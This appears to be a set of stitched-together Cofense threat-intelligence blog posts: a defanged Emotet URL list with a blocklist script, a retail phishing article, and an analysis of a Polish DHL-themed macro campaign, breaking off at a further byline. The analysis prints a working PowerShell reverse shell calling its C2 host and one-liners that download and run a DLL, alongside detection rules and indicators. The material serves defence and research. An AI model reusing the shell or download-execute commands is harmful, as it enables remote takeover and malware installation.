hXXp://cetpro[.]harvar[.]edu[.]pe/dup-installer/2i5i_r76gl3x5v6vge_disk/individual_profile/NrWPp5_3Hj0zszymw/

hXXp://championretrievers[.]com/wp-admin/paclm/mdjx-81327-4043-zujiz-uoi7hp59w4/

hXXp://charger-battery[.]co[.]uk/chargerimages/Reporting/

hXXp://chatnwax[.]com/dir/RRETX2MC9ZE7/syc01o4x/

hXXp://cheappigeontraps[.]com/wp-admin/personal-resource/guarded-gueidxaiga-544/a4hko1sshe-6530yx62/

hXXp://cheapraccoontraps[.]com/wp-admin/parts_service/zn6iszxroew/0vqf-97169-6342681145-z9iyge-xws5/

hXXp://cherrypointanimalhospital[.]com/new/parts_service/po53iyxo22m/

hXXp://chintamuktwelfare[.]com/wuvke31kdk/open-array/open-space/j2hg7S-Mseglc5d/

hXXp://chongthamhoanglinh[.]com/cgi-bin/Reporting/

hXXp://chooseyourtable[.]sapian[.]co[.]in/wp-includes/x3qc-azmz9-340871/

hXXp://clurit[.]com/matematika/images/content/open-array/additional-portal/open-array/additional-portal/3qZqx-tb7HH2KcNhHi82/

hXXp://collegebolo[.]in/wp-content/OCT/i91smxgw72t/iayid-933690-003423-pxhqzu7z4-e9fxqjnvn/

hXXp://collegiatevideoscout[.]com/piq88y/multifunctional-zone/verifiable-portal/vzwsusvfoq2kbmt-y496uwt7xz68uy/

hXXp://compworldinc[.]com/browse/4ni6zf2fq/

hXXp://contestshub[.]xyz/wp-content/evfch-p40-368725/

hXXp://cosmeticsurgeoninkolkata[.]in/wp-content/multifunctional-zone/security-space/oG7v7CkLAl-jz0rugqbjvi73/

hXXp://cosmicconsultancy[.]in/custom-icons/Reporting/

hXXp://cp[.]3rdeyehosting[.]com/wp-includes/esp/

hXXp://crazyroger[.]com/cgi-bin/1710496674006_01bd6Zeef0mCJ_disk/external_forum/4dwy_zxz36x4/

hXXp://creatitif[.]com/wp-admin/Reporting/

hXXp://croptool[.]com/theblackjackmob/Documentation/

hXXp://crownedbynature[.]com/jtaa6jtb/LLC/

hXXp://csa[.]cries[.]ro/ckjca7/11206-JdwhXBh41Cj8irAC-resource/individual-warehouse/ay7fc9ll3dnke7e-4yw99s2t6w/

hXXp://csrngo[.]in/alfacgiapi/15vu8s-c85u1-9139/

hXXp://daisybucketdesigns[.]com/pocketframes/images/aci32rk/eTrac/5w4kiwqito3r/

hXXp://dalao5188[.]top/wp-content/open-sector/test-forum/f0pqn-5328/

hXXp://dastsaz[.]shop/wordpress/private_array/verifiable_forum/BpajlMaeH_297iwG6jj7pGc/

hXXp://datrienterprise[.]com/wp-content/eTrac/7qzoqzrkjyuc/

hXXp://demo[.]bragma[.]com/site/pt48-pk3089b-682065491-ZkL2pS9yz/open-warehouse/LXWiJKrI-62Hui1o9a/

hXXp://demo[.]podamibenepal[.]com/superior/t2c-jpip6-22/

hXXp://demo[.]tanralili[.]com/apehhpf/INC/

hXXp://designers-platform[.]com/binzbc/FILE/a69zlr8/

hXXp://dev[.]consolidationexpress[.]co[.]uk/wp-admin/closed_sector/924553_1wSxAW2z_portal/2EI6ej9js5j_15M1p7xI9Gov/

hXXp://diamondbreeze[.]com/wp-content/docs/ig220w-64348062-050708-0o2ix-nk0skuh0/

hXXp://diecinuevebn[.]com/cgi-bin/protected-disk/verified-forum/ah7hwmjvvuuy84mx-t467s/

hXXp://diegojmachado[.]com/cgi-bin/open_sector/CLp2Etz_eUR1Q6uDDBgHkI_area/bDuOHXDda_cgI6sNcjl1gK/

hXXp://dishekimieroluzun[.]com/wp-content/DOC/

hXXp://dreammotokolkata[.]com/cqye/iaft92-6lplx-826/

hXXp://drsudhirhebbar[.]com/minds/private-sector/open-portal/rb2vj1kuwjbb-swuys/

hXXp://dubit[.]pl/site2/pxre-ns-297/

hXXp://dumann[.]com[.]br/z3gy5lb/sites/7bg1i8n2/jvsjhn3j-868085891-343651-sgosfko-20u4kmz2cb/

hXXp://elitexpressdiplomats[.]com/cgi-bin/available-array/guarded-5UJi7-pIM1v1g3Q6k6/whf6zxh-txsts2/

hXXp://empowerlearning[.]online/wp-admin/ruh006-rgkj-590/

hXXp://especialistassm[.]com[.]mx/inoxl28kgldf/docs/l5rbj6g/iibea-032709148-341719111-6r6auusna-6j9m/

hXXp://euonymus[.]info/twxppk/Document/7uo0t4osm95p/

hXXp://evokativit[.]com/TEST777/YHErlTl/

hXXp://evolvedself[.]com/dir/azpdj41_sugzd3yhwwsy_3709679_Rvta29FrYib/special_QDPYSSWZ1L_PJAv0ICNK1P/2Edulb_98mGeuzy3ty2Lz/

hXXp://extend[.]stijlgenoten-interactief[.]nl/test/Pages/w6014u-84395-6469-hthslxcbne-8vj2et4/

hXXp://finndonfinance[.]com/wp-content/Document/wjswrn1s/qgltg-85747767-49820504-2gz892-ydp6o4o4e/

hXXp://fooladshahr[.]simamanzar[.]ir/dup-installer/closed_box/interior_portal/0f6j5b5bga_06zs0/

hXXp://fozet[.]in/wp-content/eTrac/hb6yb86ei36/yrqsf32-172576671-4195092231-c97ty6f-5cu2q8hj8/

hXXp://freestyle[.]hk/picture_library/eTrac/s9shv2eo/

hXXp://frezydermusa[.]com/wp-content/parts_service/fisq814goap0/fhyl68-5565-326796-rr55j9spg-ug9mfyg/

hXXp://galeriariera[.]cat/assets/lm/g9zkvryjwq-0524005005-0333576-k58dqx5-326yx/

hXXp://gameonline11[.]com/wordpress/pqOAPS/

hXXp://gargchaat[.]com/phpmailo/lm/538skcfoe/7vps0iy-66657310-44075-q2gbc4-2vhp2c/

hXXp://gayweddingsarasota[.]com/cgi-bin/esp/68f6yd4ehwdr/

hXXp://gayweddingtampabay[.]com/cgi-bin/private-2828581710383-rNH3ETP8sT2ggXrt/additional-forum/DEsne0OE5vz-KmmglLMf/

hXXp://geekmonks[.]com/cgi-bin/common_sector/special_forum/9cfuf_ts9y4twzx0709/

hXXp://germxit[.]mu/calendar/4rxl-2932-78/

hXXp://gestto[.]com[.]br/wp-lindge/Scan/

hXXp://getabat[.]in/wp-content/closed_module/test_88i6oai_sjwnuscqjjl/abgyQKwZhv6i_inKjGl8hG98/

hXXp://globalstudymaterial[.]com/pdf/available-zone/individual-warehouse/vWOq8gdCRu0-ra1nf24iHayat/

hXXp://goldinnaija[.]com/wp-admin/sites/xaz6-030261-0911995608-sm9u-99rd1/

hXXp://gomaui[.]co/wp-includes/personal-resource/test-area/a9kj-wsuyvw59t/

hXXp://grace2hk[.]com/b6vg89hb/common_sector/security_forum/4tx_uu501xxxs/

hXXp://grahaksatria[.]com/towed/private_box/additional_forum/x1T0kdo_q89uLjatbqJ8/

hXXp://greatercanaan[.]org/wp-admin/Document/kqfz63hy/

hXXp://grocery2door[.]com/nkpk/97_dwi59_03276182_sJsjrqR/corporate_warehouse/13wrnaGqqET_lIy0l5eJsNdIc/

hXXp://groovy-server[.]com/masjid/backend/web/assets/rhhl/

hXXp://group8[.]metropolitanculture[.]net/wp-admin/multifunctional-sector/verifiable-cloud/l0q-4vww/

hXXp://haoyun33[.]com/wordpress/browse/9kmt2hi/

hXXp://hasung[.]vn/wp-includes/1bvxk7fvre5_lnci6bcnim_resource/special_forum/5BZ0CZ_p4052N871e/

hXXp://hfn-inc[.]com/mail/available-box/security-PgUqz6ktI-GY00tgjAgbFSr5/zy5escaf56fzw5y-y78s2tzu60v7z4/

hXXp://homecarehvac[.]com/wp-includes/open_resource/guarded_profile/eshftvv0ht_61x297v2/

hXXp://indusautotec[.]com/n8l7suy/open-xNFfQ20VO-FjqtokyzbQ6HGF/security-jdEM-dDzAJO2Ccnx/G3P8qq-MmI2GLf3JdK/

hXXp://jgx[.]xhk[.]mybluehost[.]me/scarcelli/multifunctional_098152347732_CYNEZ9DFQ/guarded_space/2qq1r_29xuz/

hXXp://jurness2shop[.]com/cgi-bin/private_disk/individual_ufyGUNB_QRlHjxmYMMbuaY/30lpuw22llwzm_vx60vx4s/

hXXp://kallinsgate[.]com/cw6vmaj/common-2561851-hLdPAOsBNVrNeE/open-space/5irmsa8-8x82zv7t2zw2x/

hXXp://kanntours[.]com/wp-security/Overview/yprr0k8-808004671-920995225-dc1d7q7-trbbwtd/

hXXp://kayzer[.]yenfikir[.]com/quadra[.]goldeyestheme[.]com/lm/

hXXp://kelurahanraya[.]ulvitravel[.]com/tmp/eTrac/wpag9c-3294986-0565941971-rbtkv0yr0p-rs604o/

hXXp://kpu[.]dinkeskabminsel[.]com/wp-admin/available_229278636_TO7LG1kXBWax3/847166_Zm9B3oXaP_portal/ZcAtrKAnB_nJGzswNc/

hXXp://kyrmedia[.]com/whnh/closed_zone/test_warehouse/o1yvycunyw222_tz6z71svs35/

hXXp://lalletera[.]cat/bootstrap/closed-array/test-warehouse/9y3rm68-7251/

hXXp://lastminuteminicab[.]com/l56mcv/Scan/qrg67fldazss/cd38ot-8952552-5429276851-63g720il-z2uwrr/

hXXp://lindamarstontherapy[.]com/psqlud/common_1810413_gc4qCpSFYbBM/additional_forum/4kmyjjijspz85_tt20x6w/

hXXp://liveleshow[.]com/cgi-bin/open-sEVbZ-kyyyJcjMY/verified-area/n7tk0nygk2up7j-7824vz2y/

hXXp://lsperennial[.]com/tnnfxu/545533028378/ofzt2ll4a-4754801-8569215-64d2t-rbtsi5ylgq/

hXXp://masspaths[.]org/transcyclist/open-array/69537295-LwrlRuR-portal/riy-u5984475/

hXXp://mistyvillage[.]com/inoxl28kgldf/open-sector/individual-forum/TC1AThq8D-H4iKcw9erMc8a7/

hXXp://monoclepetes[.]com/disneyworldclassroom/browse/

hXXp://mosaiclabel[.]com/4f9xnykaf/common-box/corporate-a30njr6-34dhllfehbjex6/14rm3hr6k358-x32zy5/

hXXp://myclarkcounty[.]com/wp-includes/open-resource/open-forum/o6a3exwvzfo-4wwxx8uts7/

hXXp://myfamilyresearch[.]org/dir/paclm/

hXXp://nisanurkayseri[.]com/fhiq04sgna7/a683w-an3x-4946/

hXXp://norikkon[.]com/administrator/16542-fBTLcdbEyJr-sector/VFCLsV-bAwgBBBeBqaJ-forum/fft2z7gdyzqee-8z80w6z68vs/

hXXp://nunes[.]ca/s59nlj/DOC/

hXXp://pascalterjanian[.]com/logs/multifunctional-2519534-Fs87CEgtQY82H6/verifiable-forum/2iFKNGyl-Ksmyn3gyI/

hXXp://plaestudio[.]com/wp-admin/multifunctional-zone/verified-space/zftkjoaw-xzuwtu1228/

hXXp://pmnmusic[.]com/backup-1540795171-wp-includes/Document/

hXXp://productorad10[.]cl/cdn-cgi/lm/6bwolkvw/

hXXp://radigio[.]com/qcloid/Pages/aveebb8ri/

hXXp://rememberingcelia[.]com/cgi-bin/private-box/additional-cloud/WoMAYyGYPic-ejGtLw5zKk9132/

hXXp://richardciccarone[.]com/watixl/Pages/iwq2bcuhtc/fpl5dh7-1085-7485017905-7upoox-mmwh5rr/

hXXp://rkpd[.]ulvitravel[.]com/cgi-bin/s0pgy-yg3-606/

hXXp://rozziebikes[.]com/tshirts/7XOEME6DSPI/l6bpob8m-8104-0278018-y6o222jln-fsxji7gy9l/

hXXp://safiryapi[.]net/mainto/private-zone/9977527-TGAtxV-space/noliIDq-ffuwzjN5H8zj/

hXXp://sakuralabs[.]com/4gubn/personal-zone/interior-forum/rye8idbdwx6uiw9-vtw0y35413/

hXXp://scottproink[.]com/wp-includes/LLC/3nm06yz1og/

hXXp://sigepromo[.]com/fonts/multifunctional-sector/security-kojbhnhsfxht47-4qgj/xznv8-35sz95t0t7/

hXXp://sofiarebecca[.]com/ybfm/multifunctional-XhmwQuIS-uBXA6FSMcoaXT2/7427993-1AJW4cmy-profile/P0jkvy-gwgs3qvm/

hXXp://southeasternamateurchampionships[.]com/0ng1en8p/common-57GaJ-JU2y57Cw9wWp/test-area/1CP3gWMySaac-iixIpxfJ216/

hXXp://southernlights[.]org/wp-includes/attachments/13iqe8n/

hXXp://stlaurentpro[.]com/25bd/Overview/qnrlmvj/

hXXp://stluketupelo[.]net/sermon/Document/

hXXp://technosolarenergy[.]com/wpk0/esp/xcggf7f/l41sd6-372903-111521309-pe7nqblm-rnbcyph7/

hXXp://thebeaversinstitute[.]org/m6zxne/open_sector/verifiable_grIwVfcE_JNkyS1ABG7O/JOr8Y2_c0N5pfizn8tqv/

hXXp://thecityglobal[.]com/creative/DOC/tmi48tldo/8fcpm52kxc-1823-224157721-0k5g3-2ntwz3u/

hXXp://theconsciouslivingguide[.]com/w63gh/NQOOE7ZE6E/

hXXp://theordeal[.]org/2hqr15/71028031_i0jDg_array/verified_profile/M17xNfJi_afcjbJ9y2/

hXXp://tinystudiocollective[.]com/tvtepc/parts_service/c5hlpnbm/04yte-92982998-989677-xuln504d-wj8wr99a0r/

hXXp://trinituscollective[.]com/wp-admin/DOC/3k2yxczqa-017872-15130767-6fcy299dtf-5p8y1zk/

hXXp://turbinetoyz[.]com/inc/available_sector/open_cloud/7gDaxLdZntQO_f54w1mdqt/

hXXp://vektra-grude[.]com/components/sites/xyj3oy2f/

hXXp://wolvesinstitute[.]org/wp-admin/INC/muosryq6917p/uozxo9-82202-738575-fbm4hisdv-0q5dy3ciz/

hXXp://www[.]africanswoo[.]com/wp-includes/IOG/

hXXp://www[.]bonfireholidays[.]in/efqog/Documentation/

hXXp://www[.]demarplus[.]com/19sn7/Overview/

hXXp://www[.]southwayhomes[.]co[.]uk/wp-admin/lm/5x8c1xywx2h/

hXXp://xhd[.]qhv[.]mybluehost[.]me/Maidentiffany/a4wnq/INC/be5oryde748n/877iw8k2-5677720-10188-kjqm-al3ax20hth/

hXXp://xn--3jsp48bswaq48h[.]com/binzbc/protected_disk/WsgEuoVh6_GLg1uIsNZxocly_tdagf_sb0hy87m9gi/jWdMxTd9_a73ophNx/

hXXp://yourdirectory[.]website/Mccracken/eTrac/rpiglgay-1418052884-1524951880-uuys-0fxj/

hXXps://bipinvideolab[.]com/wp-admin/51917864823222027/b0n0hcp4sl83/

hXXps://crossworldltd[.]com/wp-includes/48p5-o3ih-71/

hXXps://flexwebsolution[.]com/assets/multifunctional_disk/external_forum/7aa8z9os32iqygd_3gp4h/

hXXps://gurukool[.]tech/assets/t85vawx7s2xbi3q-1mvazihmr-module/interior-forum/gEwMX8-s0pLx8jJMLhGN/

hXXps://keshavalur[.]com/css/WRssOm/

hXXps://makmursuksesmandiri[.]com/wp-content/e3tpt3cph1wncut-ika4etq8sml6-sector/interior-htMCj-UR5CVYGd/bnb5oaopu0ptx-0wyytzw7u5/

hXXps://misterglobe[.]org/generall/Overview/i9y202-334800485-67760472-jj04w2e19-xppp1/

hXXps://mountainstory[.]pk/qoaij52hfs1d/common_FOQqDSi_Q50ORC3MzecY/guarded_9ode8j8xa3q9fa_3a14tqqj/x1e_418t92/

hXXps://murraysautoworks[.]com/contact/6VE37Q01O/50v2q5af8tv/y27daizl9-678276-439755027-2i7xojwpjd-ryyu/

hXXps://nhakhoachoban[.]vn/wp-includes/paclm/

hXXps://power-charger[.]co[.]uk/faq/Reporting/g30g4b8wvh/0w5c-2857976-135390-1dg1e-bjus2/

hXXps://risefoundations[.]in/rise/8448397_cee81q_jftx3_eseQqSx/corporate_pfmWWf_7uk8kfJTJvUrTR/OvdwZPUQy_ntycKI1ipM2/

hXXps://sharefoundation[.]in/wp-admin/multifunctional_module/test_cloud/oJuKHM3ik_Mee0ttbGc/

hXXps://summit2018[.]techsauce[.]co/startup/sYHAteT/

hXXps://timestampindia[.]com/citech/Document/

hXXps://twincitiesfrugalmom[.]com/wp-admin/eTrac/9porgmi/ul99a0-5568735694-75056-vt6wk395a-yymz6f/

hXXps://www[.]jadegardenmm[.]com/engl/docs/h85me2-45331562-6525577-0c62dwu3hl-mk47l/

hXXps://www[.]u4web[.]com/bnkddo/open_disk/guarded_kzfciuyy_v4gqdp/1dOq8z5_ILk0gJmw/
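The URL list above is defanged (hXXp, [.]) so that it cannot be clicked; to use it operationally it has to be refanged and reduced to a blocklist. The following Python is an added example, not Cofense tooling: it refangs each line, extracts and de-duplicates the hostnames (re-defanged for sharing), and counts how many payload paths sit under WordPress directories (wp-admin, wp-content, wp-includes), a pattern visible throughout the list. SAMPLE holds a few lines copied from the list; feed it the whole list in practice. The same helper applies to any defanged indicator list on this page.

```python
"""Turn the defanged Emotet delivery URLs above into a host blocklist.

Added example, not Cofense tooling.  Refangs hXXp/hXXps and [.] notation,
parses each URL, dedupes hosts and counts payload paths that live under
WordPress directories.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

WP_DIRS = ("wp-admin", "wp-content", "wp-includes")


def refang(ioc: str) -> str:
    """hXXp:// -> http://, hXXps:// -> https://, [.] -> . and [:] -> :"""
    ioc = re.sub(r"^hxxps://", "https://", ioc.strip(), flags=re.IGNORECASE)
    ioc = re.sub(r"^hxxp://", "http://", ioc, flags=re.IGNORECASE)
    return ioc.replace("[.]", ".").replace("[:]", ":")


def defang_host(host: str) -> str:
    """Re-defang a hostname so the blocklist is safe to paste into a report."""
    return host.replace(".", "[.]")


def parse_urls(lines):
    """Yield (scheme, host, path) for each non-empty defanged URL line."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        parts = urlsplit(refang(line))
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue
        yield parts.scheme, parts.hostname.lower(), parts.path


def blocklist(lines):
    """Sorted, de-duplicated hostnames in defanged form."""
    return sorted({defang_host(h) for _, h, _ in parse_urls(lines)})


def wordpress_dir_counts(lines):
    """Count URLs whose first path directory is a WordPress directory."""
    counts = Counter()
    for _, _, path in parse_urls(lines):
        first = path.strip("/").split("/", 1)[0]
        if first in WP_DIRS:
            counts[first] += 1
    return counts


# A handful of lines copied from the list above (defanged as published).
SAMPLE = """
hXXp://3mbapparel[.]com/ce8p4mw/Scan/23sr2r3h-227136449-4100-o7f3aukln-5ek9w7yx/
hXXp://agramarket[.]com/wp-admin/554841538461/9igxpru22w-3404-624501945-dtenc-cvona7/
hXXp://agramarket[.]com/wp-admin/images/Document/
hXXp://alfaem[.]by/wp-includes/wcevu12a6j/ui13miem-1842496-647941-b1maguvyl7-0wm1/
hXXp://anhjenda[.]net/wp-content/vmpyh5c3pi/
hXXps://bipinvideolab[.]com/wp-admin/51917864823222027/b0n0hcp4sl83/
""".splitlines()

if __name__ == "__main__":
    print("\n".join(blocklist(SAMPLE)))
    print(dict(wordpress_dir_counts(SAMPLE)))
```

Block on hostname rather than full URL: the paths are per-campaign and rotate, while a compromised site tends to stay compromised for a while. The WordPress-directory count is a reminder that most of these hosts are victims themselves, so a blocklist entry should be reviewed before it becomes permanent.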


By Tonia Dudley

The modern-day shopping mall arrived in the mid-1950s and rose in popularity as the go-to place for shopping in the decades that followed. Watching the hit series Stranger Things is a great reminder of the mall experience, but how times have changed with the introduction and boom of the internet. Retailers shifted their approach to stay relevant in the online era by standing up websites to accompany their brick & mortar locations.

Today we see retail outlets that exist solely in the web sphere – without any type of building. They are prime targets not only for consumer fraud but also cyber-attacks on retail data and reputations. The online marketplace excels in delivering goods quickly to the “I need to have it now” buyer. Threat actors excel too. They are masters at leveraging this urgency, as well as today’s delivery methods, to lure shoppers into scams.

And consumers aren’t the only targets. Attackers go after employees at retail organizations with phishing emails designed to steal customer data and create a PR nightmare. When this happens, consumers naturally think twice about buying again.

83% of consumers are concerned about purchasing from a company that was previously breached.

60% of POS compromises started with a phishing attack.

Source: 2019 Generali Global Assistance Cyber & Digital Protection Survey

What does this all mean when it comes to the phishing threat landscape? Consumers generally require a username and password to place an order on most websites. Based on threat intelligence from our research teams here at Cofense™, we know that threat actors primarily craft emails designed to steal credentials, both from consumers to gain access to online accounts and from retail employees to gain a foothold in an organization and compromise further. This is why it is critical for retail organizations to ensure their support staff have been trained to identify and report phishing attempts to gain access to their credentials.

29% of all breaches involve stolen credentials.

Source: 2019 Verizon Data Breach Investigations Report

Cofense partnered with the Retail ISAC this past summer to conduct a benchmark study. Participants ranged from small to large organizations. It is clear that organizations with an easy reporting method – a button within the mail client – are more resilient against phishing threats.

Figure 1: Susceptibility and resiliency rates for manual reporting vs. email button-based reporting, average

Figure 2: Susceptibility and resiliency rates for reporting by user group size

Retail organizations are no different than other industries – to effectively defend against phishing attacks, they need visibility of attacks that have bypassed existing controls. It takes more than a Secure Email Gateway and phishing Computer Based Training to enable Security Teams to respond quickly and reduce the risk of compromise or data breach. Cofense is uniquely positioned to help retail organizations unite to fight phishing through our comprehensive phishing defense portfolio.

To learn more about retail phishing attacks and how Cofense can help, view our new infographic.



PowerShell Scripts Delivered Via Office Macro Attachments Target Polish Employees

By Max Gannon

Cofense IntelligenceTM has uncovered an advanced phishing campaign targeting Polish employees that delivers PowerShell scripts designed to evade detection by security technologies and give threat actors remote control of the infected computer. The Polish-language emails in this campaign impersonate DHL, using misleading content and a spoofed sender email address. The attachment contains a Microsoft (MS) Office macro that checks the language of the installed Office program and only proceeds if it is Polish. A Visual Basic script is then downloaded that, in turn, retrieves a set of PowerShell scripts, enabling the threat actor to seize control of the computer remotely.

Figure 1: Original Email

The attached .xls file contains a macro that prompts the “Enable Content” message as well as displaying a button to “print” a receipt, likely intended to lend an air of legitimacy and provide a further reason to enable macros.

Figure 2: Attached Spreadsheet Content

This button does not appear to work even if macros are enabled. Once enabled, the macro checks whether the language of the installed Office product is Polish. If it is not, the file closes and opens a new blank workbook. If the installed Office product language is Polish, a .vbe script is downloaded. This script then runs and repeatedly requests a new payload from the same location (mantoropols[.]xyz), processing each response as a separate PowerShell script. It also attempts to disguise its traffic by performing multiple HTTP POSTs to google.com. The POST parameters that retrieve the PowerShell scripts appear to carry identifying information about the local computer; however, all of the variables are pre-set when the script runs, and only the ID value is unique.

Figure 3: POST Data from Office macro

Each session with the Command & Control (C2) server begins with a request for information about the local computer, issued as direct PowerShell commands interspersed with consistently placed garbage strings. By retrieving these commands through the C2 channel rather than using a locally saved list of possible commands, the threat actors make it harder for defenders to know the full suite of options and capabilities available to them. By collecting the information via PowerShell queries, the threat actors also make it easier to detect virtual environments, as the information retrieved by PowerShell is harder to spoof than the data reverse engineers typically disguise.

The requested information is:

  • Processor ID (Serial Number)
  • Full Operating System Version
  • Computer name
  • Username
  • Computer “model” (detects VMWare)
  • Computer “manufacturer” (detects VMWare)
  • System language
  • Processor architecture (x86 or x64)
  • PowerShell version
  • Total Physical memory (detects VMWare)
  • IP address
  • Current working directory
  • Current date
  • Installation date (detects VMWare)
  • Graphics card (detects some virtual environments)

The image in Figure 4 is an example of the repeated exchange. Each line beginning with “try” is sent from the server, and the following indented line is sent from the infected computer.

Figure 4: Data Exfiltration

Next, there are three (or more) separate scripts. Script 1 checks anti-virus and sets persistence via an encoded registry entry and a startup shortcut that often changes based on new commands.

Figure 5: Creation of LNK Used For Persistence And Decoded Content

The URL payload in the registry is called “finalPayload” in the conversations with the C2, which gives some insight into how much of the infection process is driven by the scripted C2 exchange rather than by hands-on involvement from the threat actor. In a similar manner, the threat actor names the section of the script that creates the LNK file “lnkl”. This labeling is seen at the end of each conversation: the server ends it by sending a label such as “lnkl” to the host, and the host responds with that same label.

The payload downloaded by the LNK persistence mechanism is yet another script that initiates a persistent connection to the C2 and then waits for commands.

# $test is assigned but never used by the script
$test = 0;
# Outer loop: keep redialing the C2 until a connection succeeds
while ($true) {
  try {
    $ErrorActionPreference = "SilentlyContinue";
    # Plain TCP connection to the C2 on port 80 (domain defanged as published)
    $GoYsd803308 = New-Object Net.Sockets.TCPClient("chtroppsoj[.]info", 80);
    $LbkfB457364 = ($GoYsd803308.GetStream());
    # 501-byte zeroed receive buffer
    [byte[]]$dCrY874 = 0..500 | % { 0 };
    # Read a command, run it with iex, and send stdout+stderr back on the same socket
    while (($lxQIfq175383 = $LbkfB457364.Read($dCrY874, 0, $dCrY874.Length)) -ne 0) {
      $zGNk383 = (New-Object Text.ASCIIEncoding).GetString($dCrY874, 0, $lxQIfq175383);
      $kpqm758 = ([text.encoding]::ASCII).GetBytes((iex $zGNk383 2>&1));
      $LbkfB457364.Write($kpqm758, 0, $kpqm758.Length);
      $LbkfB457364.Flush()
    }
  } catch {
    # On any failure, wait 15 seconds, drop the connection, and try again
    Start-Sleep -s 15;
    if ($GoYsd803308.Connected) {
      $GoYsd803308.Close();
    }
  }
}


Once this persistence mechanism has been established, the next stage is most often the download of additional malware such as Ursnif. This next script is labeled by the threat actor as “downdll” and as its name implies, only downloads a .dll without executing anything.

"downdll"; $XwmpW = New-Object System.Net.WebClient; $XwmpW.Headers["User-Agent"] = "";  $XwmpW.DownloadFile("hXXps://arethatour[.]icu/372873/corpo1.dll", "$env:APPDATA\Sg.dll");

The following script is labeled “rundll”. Unsurprisingly, this runs the .dll downloaded by the previous script.

"rundll"; Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList "$env:APPDATA\Sg.dll,DllRegisterServer"

Once this command is executed and the client responds with the appropriate “rundll”, the cycle begins again.

By using deceptively simple commands and minimal code, threat actors can perform data exfiltration and payload downloading while maintaining a relatively small footprint. The small script and reliance on executing code either in memory or using data from a registry entry enables threat actors to leave only the .lnk file used for persistence on infected computers. As a result, the threat actors involved in this infection represent a threat to enterprises that do not block PowerShell execution or do not log executed scripts. What makes this threat even more concerning is that although the current process appears to be automated, it would require relatively little effort on the part of the threat actor to manually engage with infected computers.
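The paragraph above notes that this chain leaves almost nothing on disk and that enterprises which log executed PowerShell are far better placed to catch it. As an added example (not Cofense code), the following Python runs a handful of signatures derived from the scripts shown above over the text of PowerShell script-block log records, assumed to have been exported as the ScriptBlockText of Microsoft-Windows-PowerShell/Operational event 4104. The records, including the benign control, are constructed, and the rule names are mine.

```python
"""Script-block log triage for the PowerShell chain described above.

Added example, not Cofense tooling.  Each rule is a set of regexes that
must ALL match one script-block record; the patterns are taken from the
reverse shell, the 'downdll' one-liner and the 'rundll' one-liner shown
on this page.
"""
import re

RULES = [
    ("tcp_reverse_shell_iex", [
        r"Net\.Sockets\.TCPClient",
        r"\.GetStream\(\)",
        r"\b(iex|Invoke-Expression)\b",
    ]),
    ("webclient_dll_to_appdata", [
        r"Net\.WebClient",
        r"\.DownloadFile\(",
        r"\$env:APPDATA\\[^\"']*\.dll",
    ]),
    ("blank_user_agent", [
        r"Headers\[\s*['\"]User-Agent['\"]\s*\]\s*=\s*['\"]{2}",
    ]),
    ("rundll32_appdata_dllregisterserver", [
        r"rundll32(\.exe)?",
        r"\$env:APPDATA",
        r"DllRegisterServer",
    ]),
]


def match_rules(script_text: str) -> list:
    """Names of rules whose regexes all match the record (case-insensitive)."""
    hits = []
    for name, patterns in RULES:
        if all(re.search(p, script_text, re.IGNORECASE | re.DOTALL) for p in patterns):
            hits.append(name)
    return hits


def triage(events):
    """events: iterable of (event_id, script_text).  Return {event_id: [rule names]}."""
    results = {}
    for eid, text in events:
        hits = match_rules(text)
        if hits:
            results[eid] = hits
    return results


# Constructed script-block records.  Record 1 condenses the persistence
# script from this page; 2 and 3 are the downdll/rundll one-liners; 4 is a
# benign admin command that also touches APPDATA and must not fire.
EVENTS = [
    (1, '$c = New-Object Net.Sockets.TCPClient("chtroppsoj[.]info", 80); '
        '$s = $c.GetStream(); $r = (iex $cmd 2>&1)'),
    (2, '"downdll"; $w = New-Object System.Net.WebClient; '
        '$w.Headers["User-Agent"] = ""; '
        '$w.DownloadFile("hXXps://arethatour[.]icu/372873/corpo1.dll", "$env:APPDATA\\Sg.dll");'),
    (3, '"rundll"; Start-Process -FilePath "C:\\Windows\\System32\\RUNDLL32.EXE" '
        '-ArgumentList "$env:APPDATA\\Sg.dll,DllRegisterServer"'),
    (4, 'Get-ChildItem $env:APPDATA -Recurse | Where-Object Length -gt 1MB'),
]

if __name__ == "__main__":
    for eid, hits in triage(EVENTS).items():
        print(f"event {eid}: {', '.join(hits)}")
```

Script-block logging records the de-obfuscated text that actually ran, which is why the random variable names in the original script do not matter to these rules. The empty User-Agent header is the weakest of the four signals on its own but is cheap to check and rarely seen in legitimate administrative scripts.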

Description                                      Indicator
PowerShell Reconnaissance Tool Payload and C2s   hXXps://chtroppsoj[.]info:443/debug/download/s/rKD
                                                 hXXps://gillslodss[.]info:443/debug/download/s/Gpf
                                                 hXXps://chtroppsoj[.]info:443/debug/download/s/DoFH
                                                 hXXps://seioodsoi[.]club:443/chkesosod/downs/VhQWr
                                                 hXXps://chtroppsoj[.]info:443/debug/download/s/ydFFLg
                                                 hXXps://arethatour[.]icu/372873/corpo1.dll
                                                 hXXps://chtroppsoj[.]info:443/debug/download/s/QqTlFT
                                                 chtroppsoj[.]info
Visual Basic Script Payload                      hXXps://mantoropols[.]xyz/
Visual Basic Script File                         printhpp.vbe
                                                 712754776baf025993b16846b97a331b
Office Macro Payload                             hXXps://reloffersstart[.]co/ss[.]php?
Office Macro Files                               20889194950.xls
                                                 c53b7ebf5e5459727d80b485d1a964e8
                                                 24759494620.xls
                                                 ef4b91920f1567cc8f6bece2bcd4e010
                                                 28301710180.xls
                                                 ab515665320573a21155a6abeb2d54a3

Table 1: PowerShell Reconnaissance Tool Payload and Command and Control (C2) Locations

How Cofense Can Help:

100% of malware-bearing phishing threats analyzed by the Cofense Phishing Defense Center were reported by end users and bypassed technical controls that were in place to protect them.

Cofense PhishMe offers a simulation template, “Return Shipment – Polish,” to educate users on the phishing tactic described in this blog. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 32814.

Quickly turn user reported emails into actionable intelligence with Cofense Triage and reduce exposure time by rapidly quarantining threats with Cofense Vision.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

This Advanced Keylogger Delivers a Cryptocurrency Miner

By Aaron Riley

